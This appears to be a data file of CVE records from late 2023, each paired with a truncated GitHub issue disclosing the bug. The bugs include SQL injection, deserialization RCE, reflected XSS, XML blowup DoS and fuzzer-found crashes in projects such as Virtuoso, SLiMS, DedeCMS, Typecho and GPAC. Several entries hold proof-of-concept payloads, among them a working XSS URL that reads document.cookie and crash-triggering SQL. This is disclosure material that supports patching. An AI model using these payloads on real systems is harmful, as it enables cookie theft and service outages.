[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.11:*:*:*:open_source:*:*:*", "matchCriteriaId": "CFFFE658-0D7C-4439-B193-1595F8F965F0", "versionEndExcluding": null, "versionEndIncluding": null, "ver...
[ "787" ]
787
https://github.com/openlink/virtuoso-opensource/issues/1172
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```sql CREATE TABLE v0 ( v1 DECIMAL ) ; INSERT INTO v0 VALUES ( 0 ) ; INSERT INTO v0 ( v1 ) SELECT CASE v1 WHEN 49 THEN v1 ELSE -128 END FROM v0 AS v2 , v0 , v0 AS v3 GROUP BY v1 , v1 ; UPDATE v0 SET v1 = ( SELECT DISTINCT * FROM v0 ) ; ``` Server Log: ``` ...
Fuzzer: Virtuoso 7.2.11 crashed by stack smashing
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1172/comments
2
2023-11-14T14:41:15Z
2023-11-20T16:31:19Z
https://github.com/openlink/virtuoso-opensource/issues/1172
1,992,885,538
1,172
5,780
CVE-2023-48952
2023-11-29T20:15:08.133
An issue in the box_deserialize_reusing function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1175" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://githu...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.11:*:*:*:open_source:*:*:*", "matchCriteriaId": "CFFFE658-0D7C-4439-B193-1595F8F965F0", "versionEndExcluding": null, "versionEndIncluding": null, "ver...
[ "502" ]
502
https://github.com/openlink/virtuoso-opensource/issues/1175
[ "Exploit", "Issue Tracking" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE v0 ( v1 INT , v2 BIGINT PRIMARY KEY) ; INSERT INTO v0 VALUES ( 20 , -1 ) ; SELECT v1 + 77 , v2 FROM v0 UNION SELECT v2 , CASE WHEN 92 THEN 86 ELSE ( ( 32433852.000000 , 70038895.000000 ) , ( 64572024.000000 , 4442219.000000 ) ) END FROM v0 ORDER BY v2 + ...
Fuzzer: Virtuoso 7.2.11 crashed at box_deserialize_reusing
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1175/comments
3
2023-11-14T15:13:36Z
2023-12-04T14:53:16Z
https://github.com/openlink/virtuoso-opensource/issues/1175
1,992,951,081
1,175
5,781
CVE-2023-48813
2023-12-01T16:15:07.487
Senayan Library Management Systems (Slims) 9 Bulian v9.6.1 is vulnerable to SQL Injection via admin/modules/reporting/customs/fines_report.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/komangsughosa/CVE-ID-not-yet/blob/main/slims/slims9_bulian-9.6.1-SQLI-fines_report.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system_bulian:9.6.1:*:*:*:*:*:*:*", "matchCriteriaId": "0439647C-9560-44A0-B186-BFDF828ECD17", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "89" ]
89
https://github.com/slims/slims9_bulian/issues/217
[ "Exploit", "Issue Tracking" ]
github.com
[ "slims", "slims9_bulian" ]
**Describe the bug** A SQL Injection exists in admin/modules/reporting/customs/fines_report.php at the code below ```php $selected_year = date('Y'); if (isset($_GET['year']) AND !empty($_GET['year'])) { $selected_year = (integer)$_GET['year']; } // month $selected_month = date('m'); ...
[Security Bugs] SQL Injection at fines_report.php
https://api.github.com/repos/slims/slims9_bulian/issues/217/comments
1
2023-11-13T00:00:09Z
2025-01-01T10:42:59Z
https://github.com/slims/slims9_bulian/issues/217
1,989,644,007
217
5,782
CVE-2023-48893
2023-12-01T16:15:07.607
SLiMS (aka SENAYAN Library Management System) through 9.6.1 allows admin/modules/reporting/customs/staff_act.php SQL Injection via startDate or untilDate.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/Vuln0wned/slims_owned/blob/main/slims/slims9-bulian-9.6.1-SQLI-staff_act.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/slims/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slims:senayan_library_management_system_bulian:9.6.1:*:*:*:*:*:*:*", "matchCriteriaId": "0439647C-9560-44A0-B186-BFDF828ECD17", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "89" ]
89
https://github.com/slims/slims9_bulian/issues/209
[ "Exploit", "Issue Tracking" ]
github.com
[ "slims", "slims9_bulian" ]
## The Bug A SQL Injection exists in `admin/modules/reporting/customs/staff_act.php` at the code below ```php // create datagrid $reportgrid = new report_datagrid(); $reportgrid->setSQLColumn('u.realname AS \''.__('Real Name').'\'', 'u.username AS \''.__('Login Username').'\'', 'u.user_id AS \''._...
Vuln0wned Report: SQL Injection in staff_act.php
https://api.github.com/repos/slims/slims9_bulian/issues/209/comments
0
2023-09-01T09:36:16Z
2023-09-05T06:25:21Z
https://github.com/slims/slims9_bulian/issues/209
1,877,090,139
209
5,783
CVE-2023-48886
2023-12-01T23:15:07.920
A deserialization vulnerability in NettyRpc v1.2 allows attackers to execute arbitrary commands via sending a crafted RPC request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/luxiaoxun/NettyRpc" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/luxiaoxun/NettyRpc/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:luxiaoxun:nettyrpc:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "950F4B86-CD1E-4630-B86F-B14F7439FF04", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "502" ]
502
https://github.com/luxiaoxun/NettyRpc/issues/53
[ "Exploit" ]
github.com
[ "luxiaoxun", "NettyRpc" ]
# Describe the Vulnerability A deserialization vulnerability in NettyRpc v1.2 allows attackers to execute arbitrary commands via sending a crafted RPC request. # Environment - NettyRpc: v1.2 - JVM version: JDK 1.8(Tested on JDK 1.8.0_65) # Preparation for Vulnerability Verification #### For the purpose of th...
Kryo Deserialization Vulnerability in NettyRpc 1.2
https://api.github.com/repos/luxiaoxun/NettyRpc/issues/53/comments
0
2023-12-01T02:23:13Z
2023-12-01T02:23:13Z
https://github.com/luxiaoxun/NettyRpc/issues/53
2,019,920,057
53
5,784
CVE-2023-48887
2023-12-01T23:15:07.967
A deserialization vulnerability in Jupiter v1.3.1 allows attackers to execute arbitrary commands via sending a crafted RPC request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/fengjiachun/Jupiter" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/fengjiachun/Jupiter/issues/115" }, { "source": "cve@mitre.org", "tags": [ ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fengjiachun:jupiter:1.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "E43B5331-436C-4FB7-86F3-3CFC618F4E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "502" ]
502
https://github.com/fengjiachun/Jupiter/issues/115
[ "Exploit" ]
github.com
[ "fengjiachun", "Jupiter" ]
# Describe the Vulnerability A deserialization vulnerability in Jupiter v1.3.1 allows attackers to execute arbitrary commands via sending a crafted RPC request. # Environment - Jupiter version: v1.3.1 - JVM version: JDK 1.8(Tested on JDK 1.8.0_65) # Preparation for Vulnerability Verification 1. There is an a...
Kryo Deserialization Vulnerability in Jupiter v1.3.1
https://api.github.com/repos/fengjiachun/Jupiter/issues/115/comments
0
2023-12-01T02:14:00Z
2023-12-01T02:14:00Z
https://github.com/fengjiachun/Jupiter/issues/115
2,019,911,389
115
5,785
CVE-2020-36768
2023-12-03T11:15:08.443
A vulnerability was found in rl-institut NESP2 Initial Release/1.0. It has been classified as critical. Affected is an unknown function of the file app/database.py. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The pa...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/rl-institut/NESP2/commit/07c0cdf36cf6a4345086d07b54423723a496af5e" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/rl-institut/NESP2/is...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:reiner-lemoine-institut:nesp2:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FCEB5AF1-39EE-4BAE-9D86-794A3A76FFD9", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "89" ]
89
https://github.com/rl-institut/NESP2/issues/334
[ "Issue Tracking", "Patch" ]
github.com
[ "rl-institut", "NESP2" ]
Hi, just passing by, but noticed (at least one) sql injection issue in https://github.com/rl-institut/NESP2/blob/a82e6ce7ae6e81b2a1e08a31858399839c0fdf81/app/database.py#L66 user-controlled data is used without escaping in a raw sql query. I suggest either to use the orm layer, or maybe one of ``` table = Tabl...
possible sql injection
https://api.github.com/repos/rl-institut/NESP2/issues/334/comments
6
2020-11-05T00:24:25Z
2020-11-05T13:06:23Z
https://github.com/rl-institut/NESP2/issues/334
736,512,310
334
5,786
CVE-2023-48967
2023-12-04T17:15:07.190
Ssolon <= 2.6.0 and <=2.5.12 is vulnerable to Deserialization of Untrusted Data.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/noear/solon/issues/226" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:noear:solon:*:*:*:*:*:*:*:*", "matchCriteriaId": "BD386ABC-5F19-4CAA-8AD4-795101461DE6", "versionEndExcluding": null, "versionEndIncluding": "2.5.12", "versionStartExcluding"...
[ "502" ]
502
https://github.com/noear/solon/issues/226
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "noear", "solon" ]
### Issue Description We recently discovered that Solon provides 'Fury' as a serialization and deserialization solution for RPC. However, our research has found that the corresponding component has a security vulnerability. Attackers can execute a JNDI injection attack using a carefully constructed attack payload. ...
A new RCE vulnerability
https://api.github.com/repos/opensolon/solon/issues/226/comments
4
2023-11-16T11:03:17Z
2025-03-31T03:44:33Z
https://github.com/opensolon/solon/issues/226
1,996,605,274
226
5,787
CVE-2023-49096
2023-12-06T20:15:07.287
Jellyfin is a Free Software Media System for managing and streaming media. In affected versions there is an argument injection in the VideosController, specifically the `/Videos/<itemId>/stream` and `/Videos/<itemId>/stream.<container>` endpoints which are present in the current Jellyfin version. Additional endpoints i...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "security-advisories@github.com", "tags": [ "Not Applicable" ], "url": "https://cwe.mitre.org/data/definitions/88.html" }, { "source": "security-advisories@github.com", "tags": [ "Not Applicable" ], "url": "https://en.wikipedia.org/wiki/Pass_the_hash" },...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*", "matchCriteriaId": "93D6F598-55D9-4041-BED8-4448226B5EFF", "versionEndExcluding": "10.8.13", "versionEndIncluding": null, "versionStartExc...
[ "88" ]
88
https://github.com/jellyfin/jellyfin/issues/5415
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jellyfin", "jellyfin" ]
# Collection of *potential* security issues in Jellyfin This is a non exhaustive list of *potential* security issues found in Jellyfin. Some of these might cause controversy. Some of these are design flaws and require breaking changes to correct them. I tried to categorize the issues in general topics. Expansions of t...
Collection of potential security issues in Jellyfin
https://api.github.com/repos/jellyfin/jellyfin/issues/5415/comments
88
2021-03-08T17:36:50Z
2025-04-23T19:55:37Z
https://github.com/jellyfin/jellyfin/issues/5415
824,791,596
5,415
5,788
CVE-2023-49958
2023-12-07T13:15:07.833
An issue was discovered in Dalmann OCPP.Core through 1.2.0 for OCPP (Open Charge Point Protocol) for electric vehicles. The server processes mishandle StartTransaction messages containing additional, arbitrary properties, or duplicate properties. The last occurrence of a duplicate property is accepted. This could be ex...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/dallmann-consulting/OCPP.Core/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dallmann-consulting:open_charge_point_protocol:*:*:*:*:*:*:*:*", "matchCriteriaId": "E2779F2A-1D74-4C69-8151-B5E9D49F025A", "versionEndExcluding": null, "versionEndIncluding": "1.2.0", ...
[ "20" ]
20
https://github.com/dallmann-consulting/OCPP.Core/issues/36
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "dallmann-consulting", "OCPP.Core" ]
**Issue Description**: The server accepts additional, arbitrary properties in the `StartTransaction` message, and when duplicate properties are provided, it accepts the last occurrence without validation. For example, a message with two different `connectorId` properties is processed using the value of the last one. ...
Unvalidated Acceptance of Additional and Duplicate Properties in `StartTransaction` Message
https://api.github.com/repos/dallmann-consulting/OCPP.Core/issues/36/comments
11
2023-11-06T19:10:53Z
2023-12-28T12:59:10Z
https://github.com/dallmann-consulting/OCPP.Core/issues/36
1,979,885,162
36
5,789
CVE-2023-49492
2023-12-07T16:15:07.587
DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the imgstick parameter at selectimages.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Hebing123/cve/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dedecms:dedecms:5.7.111:*:*:*:*:*:*:*", "matchCriteriaId": "377F392A-A04B-4E7A-BBE8-F77CE65BDFCF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "79" ]
79
https://github.com/Hebing123/cve/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Hebing123", "cve" ]
**Description** DedeCMS-V5.7.111 has Reflective XSS vulnerabilities in imgstick and v parameters of selectimages.php **Proof of Concept** `http://target-ip/uploads/include/dialog/select_images.php?activepath=/uploads/uploads/allimg&f=form1.pic1&imgstick=smallundefined%27%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/...
DedeCMS-V5.7.111 Reflective XSS vulnerability
https://api.github.com/repos/Hebing123/cve/issues/2/comments
2
2023-11-23T10:03:34Z
2024-11-28T10:41:23Z
https://github.com/Hebing123/cve/issues/2
2,007,862,637
2
5,790
CVE-2023-49967
2023-12-07T16:15:07.680
Typecho v1.2.1 was discovered to be vulnerable to an XML Quadratic Blowup attack via the component /index.php/action/xmlrpc.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/typecho/typecho/issues/1648" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third P...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:typecho:typecho:1.2.1:-:*:*:*:*:*:*", "matchCriteriaId": "0BE056CC-41EF-4C70-9B90-6C654B543A40", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "776" ]
776
https://github.com/typecho/typecho/issues/1648
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "typecho", "typecho" ]
### Vulnerability report **Description** DoS via XML Quadratic Blowup Attack **Proof of Concept** ![image](https://github.com/typecho/typecho/assets/66168888/5f217846-f321-496e-baf5-8c053c65c0d7) ``` POST /index.php/action/xmlrpc HTTP/1.1 Content-Length: 83630 Accept: text/html,application/xhtml+xml,applicat...
Typecho v1.2.1 XML Blowup Attack DoS vulnerability
https://api.github.com/repos/typecho/typecho/issues/1648/comments
0
2023-11-27T08:12:21Z
2024-01-23T10:30:18Z
https://github.com/typecho/typecho/issues/1648
2,011,731,209
1,648
5,791
CVE-2023-46871
2023-12-07T18:15:08.030
GPAC version 2.3-DEV-rev602-ged8424300-master in MP4Box contains a memory leak in NewSFDouble scenegraph/vrml_tools.c:300. This vulnerability may lead to a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/ReturnHere/d0899bb03b8f5e8fae118f2b76888486" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Adviso...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "373C4F43-207C-47CB-B454-BD90A52F0ECF", "versionEndExcluding": null, "versionEndIncluding": "2.3-dev-rev602-ged8424300-master", ...
[ "401" ]
401
https://github.com/gpac/gpac/issues/2658
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough info...
Memory leaks in NewSFDouble scenegraph/vrml_tools.c:300
https://api.github.com/repos/gpac/gpac/issues/2658/comments
2
2023-10-23T06:39:49Z
2023-12-09T11:54:02Z
https://github.com/gpac/gpac/issues/2658
1,956,459,097
2,658
5,792
CVE-2023-48958
2023-12-07T18:15:08.130
gpac 2.3-DEV-rev617-g671976fcc-master contains memory leaks in gf_mpd_resolve_url media_tools/mpd.c:4589.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/dr0v/1204f7a5f1e1497e7bca066638acfbf5" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https:/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev617-g671976fcc-master:*:*:*:*:*:*:*", "matchCriteriaId": "F540C691-D615-4A9B-8DD6-69B8488E3BA1", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "401" ]
401
https://github.com/gpac/gpac/issues/2689
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
1、Version ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io/ Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configu...
LeakSanitizer: detected memory leaks in in gf_mpd_resolve_url media_tools/mpd.c:4589
https://api.github.com/repos/gpac/gpac/issues/2689/comments
0
2023-11-16T01:53:56Z
2023-11-16T10:21:02Z
https://github.com/gpac/gpac/issues/2689
1,995,888,449
2,689
5,793